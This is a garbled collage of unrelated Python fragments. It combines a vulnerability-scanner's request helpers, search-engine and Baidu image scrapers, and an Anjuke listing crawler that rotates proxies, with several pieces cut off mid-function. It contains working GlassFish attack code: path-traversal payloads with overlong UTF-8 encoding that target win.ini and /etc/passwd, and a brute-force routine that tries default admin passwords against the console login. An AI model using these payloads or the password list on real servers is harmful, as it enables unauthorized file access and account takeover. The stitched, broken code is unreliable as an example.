def request_post(self, url, params, data, flag, success_num, username, password, success, fail, pocs):
    """POST ``data`` to ``url`` on ``self.port`` and record a finding on a marker hit.

    The response body is searched for marker strings. When at least one is
    found, a message built from ``success`` is appended to ``self.vuln`` and
    printed. When ``pocs["admin_bursk"]`` is true, that message also carries
    ``username`` and ``password`` in clear text, so the report and stdout
    then hold credentials.

    Any exception increments ``success_num``, and the call is repeated while
    ``success_num <= 2``. ``params`` and ``fail`` are only forwarded to that
    retry; nothing else in this method reads them.

    NOTE(review): the block layout was rebuilt from a listing collapsed onto
    one line. The reporting branch is assumed to follow the marker loop
    rather than sit inside it. Confirm against the original file.
    """
    try:
        headers = {'User-Agent': get_user_agent()}
        # self.port is concatenated as text, so it has to be a str.
        s = requests.post(url=url + ":" + self.port, data=data, headers=headers, timeout=self.Timeout)
        # NOTE(review): `poc` is not defined in this method (the parameter is
        # `pocs`). Unless it is a module-level name this raises NameError, which
        # the handler below swallows. The loop also rebinds the `flag` parameter.
        for flag in poc["flag"]:
            if flag in s.text:
                success_num = success_num + 1
        if success_num > 0:
            if pocs["admin_bursk"] == True:
                # NOTE(review): `utl` is not defined here, presumably `url`. Confirm.
                self.vuln.append("success url:" + utl + " " + success + ",username:%s password:%s" % (username, password))
                print("success url:" + utl + " " + success + ",username:%s password:%s" % (username, password))
            else:
                # NOTE(review): `pocs` is indexed like a mapping above; if it is a
                # dict, `str + pocs` raises TypeError. Confirm the intended type.
                self.vuln.append(success + " \n pocs: \n" + pocs)
                print(success + " \n pocs: \n" + pocs)
    except Exception:
        # The same counter holds marker hits and failed attempts, and every
        # exception type (including programming errors) lands here silently.
        success_num = success_num + 1
        if success_num <= 2:
            self.request_post(url, params, data, flag, success_num, username, password, success, fail, pocs)
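def query_baidu(term):
    """Return the ``objURL`` values found on Baidu's image-search page for *term*.

    *term* is taken as raw search text and percent-encoded here, so
    characters such as ``&``, ``#`` or ``=`` stay inside the ``word``
    parameter instead of truncating it or adding query parameters.

    The returned strings are extracted from the remote page with a regular
    expression and are not validated; callers should treat them as
    untrusted input before fetching or storing them.
    """
    from urllib.parse import quote

    search_url = (
        'https://image.baidu.com/search/flip?tn=baiduimage&ie=utf-8&word='
        + quote(term, safe='')
        + '&ct=201326592&v=flip'
    )
    # Both proxy schemes are passed as None, presumably to keep this request
    # off any configured proxy. Confirm that this is the intent.
    response = requests.get(
        search_url,
        timeout=10,
        proxies={'https': None, 'http': None},
        headers={'User-Agent': get_user_agent()},
    )
    return re.findall('"objURL":"(.*?)",', response.text, re.S)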
def request_get(self, url, params, data, flags, success_num, success, fail, pocs):
    """GET ``url`` on ``self.port`` and record a finding in ``self.vuln``.

    With no ``flags``, any response whose status is not 404 is recorded as
    ``self.url + success``. Otherwise the body is searched for each flag,
    and one hit is enough to append and print ``success`` followed by
    ``pocs``.

    Any exception increments ``success_num``, and the call is repeated while
    ``success_num <= 2``. ``data`` and ``fail`` are only forwarded to that
    retry.

    NOTE(review): the block layout was rebuilt from a listing collapsed onto
    one line. The flag loop and the reporting branch are assumed to sit at
    the level of the ``try`` body. Confirm against the original file.
    """
    try:
        # NOTE(review): the return value is passed directly as `headers`, while
        # requests expects a mapping. Confirm get_user_agent() returns a dict in
        # this module and not a bare User-Agent string.
        headers = get_user_agent()
        s = requests.get(url=url + ":" + self.port, params=params, headers=headers, timeout=self.Timeout)
        if not flags:
            # Every status except 404 counts as a hit, including 401/403/5xx, so
            # this branch can record false positives. It also reports self.url
            # rather than the `url` argument that was requested.
            if s.status_code != 404:
                self.vuln.append(self.url + success)
        # If `flags` is None this raises TypeError, which ends up in the handler below.
        for flag in flags:
            if flag in s.text:
                success_num = success_num + 1
        if success_num > 0:
            # Requires `pocs` to be a str here. Confirm against the callers.
            self.vuln.append(success + " \npocs: \n" + pocs)
            print(success + " \npocs: \n" + pocs)
    except Exception:
        # The same counter holds marker hits and failed attempts, and every
        # exception type is swallowed without being logged.
        success_num = success_num + 1
        if success_num <= 2:
            self.request_get(url, params, data, flags, success_num, success, fail, pocs)
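def glassfish_Directory_traversal(url):
    # https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18822
    """Check whether *url* serves files through the GlassFish ``/theme`` traversal.

    Each candidate path is requested against the caller's base URL and the
    response body is searched for a marker string.

    Returns ``"exist Directory_traversal vuln"`` on the first marker hit and
    ``"no exist Directory_traversal vuln"`` otherwise. Any exception
    (connection error, timeout, ...) is also reported as "no exist", so a
    negative result does not distinguish "not affected" from "could not be
    tested".
    """
    try:
        headers = {'User-Agent': get_user_agent()}
        # One entry per line with a trailing comma: the original list lacked
        # the comma between its last two literals, which merged them into a
        # single string.
        poc = [
            "/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini",
            "/theme/META-INF/json%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini",
            "/theme/META-INF/dojo%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini",
            "/theme/META-INF%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini",
            "/theme/com/sun%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini",
            "/theme/com%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini",
            "/theme/com%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/etc/passwd",
        ]
        # NOTE(review): "root" matches any page that contains the word, so an
        # ordinary error page can produce a false positive.
        flag = ["[fonts]", "root"]
        for path in poc:
            # Build every request from the base URL. The original reassigned
            # `url` inside the loop, so each later request carried all the
            # earlier paths as a prefix.
            # The timeout keeps an unresponsive host from blocking the scan.
            s = requests.get(url=url + path, headers=headers, timeout=10)
            if any(marker in s.text for marker in flag):
                return "exist Directory_traversal vuln"
        return "no exist Directory_traversal vuln"
    except Exception:
        return "no exist Directory_traversal vuln"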
def glassfish_weak2(host):
    """Check the GlassFish admin console on *host* for a listed default password.

    Sends one POST to ``/j_security_check`` per candidate password for the
    ``admin`` user and looks for console markers in the response body. The
    URL is built with ``http://``, so every candidate travels unencrypted.

    Returns ``'YES|<url>/index.jsf GlassFish Weak password <user>:<password>'``
    on the first match; the result string therefore contains the password in
    clear text. Returns ``"no exist index.jsf GlassFish Weak password"`` when
    nothing matches and also when any request fails, so that result covers
    both "no weak password" and "check could not run".
    """
    negative = "no exist index.jsf GlassFish Weak password"
    try:
        url = "http://%s" % (host)
        headers = {'User-Agent': get_user_agent()}
        # Strings that appear on the console after a successful login.
        console_markers = [
            'Just refresh the page... login will take over',
            'GlassFish Console - Common Tasks',
            '/resource/common/js/adminjsf.js">',
            'Admin Console</title>',
            'src="/homePage.jsf"',
            'src="/header.jsf"',
            'src="/index.jsf"',
            '<title>Common Tasks</title>',
            'title="Logout from GlassFish',
        ]
        usernames = ['admin']
        candidates = [
            'admin', 'glassfish', 'password', 'adminadmin', '123456',
            '12345678', '123456789', 'admin123', 'admin888', 'admin1',
            'administrator', '8888888', '123123', 'manager', 'root',
        ]
        login_url = url + '/j_security_check?loginButton=Login'
        for user in usernames:
            for password in candidates:
                form = 'j_username=%s&j_password=%s&loginButton=Login&loginButton.DisabledHiddenField=true' % (
                    user, password)
                try:
                    page = requests.post(login_url, data=form, headers=headers).text
                except Exception:
                    # The first failed request ends the whole check.
                    return negative
                if any(marker in page for marker in console_markers):
                    return 'YES|' + '%s/index.jsf GlassFish Weak password %s:%s' % (
                        url, user, password)
        return negative
    except Exception:
        return negative
scrap_rule=lambda soup: [(a['href'], a.find('div', class_='organic__url-text').text)
                         for a in soup
                         .findAll('a', class_='organic__url', attrs={'data-bem': re.compile('^((?!video).)*$')})]),
    google=dict(
        # NOTE(review): the query is interpolated into the URL without
        # URL-encoding, so '&', '#' or spaces in it change the request.
        url_pattern=lambda x: f'https://www.google.com/search?q={x}',
        scrap_rule=lambda soup: [(div.a['href'], div.a.h3) for div in soup.find_all('div', class_='r')]),
    # 'other' defines only a scrap_rule: every absolute http(s) link on the page.
    other=dict(
        scrap_rule=lambda soup: [(a['href'], a.text) for a in soup.find_all(
            'a', href=re.compile('^(http|https)://'))]),
)

# Evaluated once at import time, so the same User-Agent value is used for as
# long as the module stays loaded.
SEARCH_ENGINE_REQUEST_HEADERS = {'User-Agent': get_user_agent()}

logger = logging.getLogger('scrapper')


def get_search_url(domain, query):
    """Return the search URL that ``domain``'s ``url_pattern`` builds for ``query``.

    Raises KeyError for a domain missing from SCRAPPING_PREFERENCES, and for
    one without a ``url_pattern`` entry; the 'other' entry shown above has none.
    """
    return SCRAPPING_PREFERENCES[domain]['url_pattern'](query)


def get_scrapping_func(domain='other'):
    """Return the ``scrap_rule`` callable registered for ``domain``.

    Raises KeyError when ``domain`` is not a key of SCRAPPING_PREFERENCES.
    """
    return SCRAPPING_PREFERENCES[domain]['scrap_rule']


def get_links(url, scrapping_rule):
    """Getting search result page html code """
import random
import re
import requests
import xlwt
from user_agent import get_user_agent
from 代理66 import get_ips

# The workbook and sheet are created at import time.
book = xlwt.Workbook(encoding='utf-8')
sheet = book.add_sheet("安居客", cell_overwrite_ok=True)
# Request headers shared by every call to req().
# NOTE(review): random.choice() picks one element of whatever
# get_user_agent() returns; if that is a str, the header becomes a single
# character. Confirm it returns a sequence of User-Agent strings.
headers = {
    'user-agent': random.choice(get_user_agent()),
    'Accept-Encoding': 'gzip, deflate',
    'referer': 'https://shanghai.anjuke.com/',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
}
# Proxy pool fetched once at import time.
# NOTE(review): each entry is passed straight to `proxies=`, so it is assumed
# to be a requests-style {scheme: proxy_url} dict. Confirm against get_ips().
ip_list = get_ips()


## Request the site
def req():
    """Fetch the listing page through a randomly chosen proxy and return the response.

    No timeout is passed to requests.get(), so a proxy that never answers
    blocks the call indefinitely.
    """
    response = requests.get('https://sh.fang.anjuke.com/', headers=headers, proxies=random.choice(ip_list))  ## add request headers, rotate the IP
    return response


# Parse the site
def crawl():